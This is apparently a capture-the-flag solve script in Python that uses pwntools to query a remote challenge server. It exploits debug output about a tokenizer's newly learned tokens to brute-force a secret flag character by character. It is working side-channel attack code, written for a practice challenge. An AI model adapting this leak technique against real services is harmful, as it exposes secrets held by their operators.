Skip to main content

exploit.py

import string
import json
from pwn import *
from ast import literal_eval

prefix = 'ictf{'

# Against localhost: bruteforce takes ~8mins
# Against remote: bruteforce takes ~10mins with the shorter dictionary

def try_flag(flag):
    with context.local(log_level='error'):
        # r = process(['python3', 'chall.py'])
        r = remote('0.cloud.chals.io', 21308)
    try:
        r.sendlineafter('Please submit the statement to be classified:\n', flag)
        r.recvuntil("[DEBUG] Resulting tokenization: new_tokens=")
        tokenization = literal_eval(r.recvline().decode())
        filtered_tokens = []
        for token in tokenization:
            while '</w>' in token:
                token = token.replace('</w>', '')
            filtered_tokens.append(token)

        r.recvuntil("[DEBUG] Newly learned tokens: ")
        new_tokens = literal_eval(r.recvline().decode())
        filtered_new_tokens = []
        for token in new_tokens:
            while '</w>' in token:
                token = token.replace('</w>', '')
            filtered_new_tokens.append(token)
        r.recvuntil("Please classify the above statement as \"human\" or \"robot\":\n")
        r.sendline('human')
        return filtered_tokens, filtered_new_tokens
    finally:
        with context.local(log_level='error'):
            r.close()


# import ipdb; ipdb.set_trace()
while True:
    all_options = list(string.ascii_lowercase + string.digits + '_\{\}')
    tokens, baseline_new_tokens = try_flag(prefix + "{{{{{{{")

    all_options = list(sorted(list(tokens) + all_options))
    # all_options = list(sorted(all_options))
    new_tokens_results = {}
    for option in all_options:
        flag = prefix + option
        tokens, new_tokens = try_flag(flag + "{{{{{{{")
        new_flag_tokens = [token for token in new_tokens if token.startswith(prefix)]
        if not new_flag_tokens:
            continue
        longest_flag_token = max(new_flag_tokens, key=len)
        new_tokens_results[option] = longest_flag_token
        print(f"{flag=} {len(new_flag_tokens)=} {new_flag_tokens=}")

    # pick the one that has the longest new token
    max_option = max(new_tokens_results, key=lambda k: len(new_tokens_results[k]))
    print(f"max_option: {max_option=} {len(new_tokens_results[max_option])=}")
    prefix += max_option
    if '}' in prefix:
        break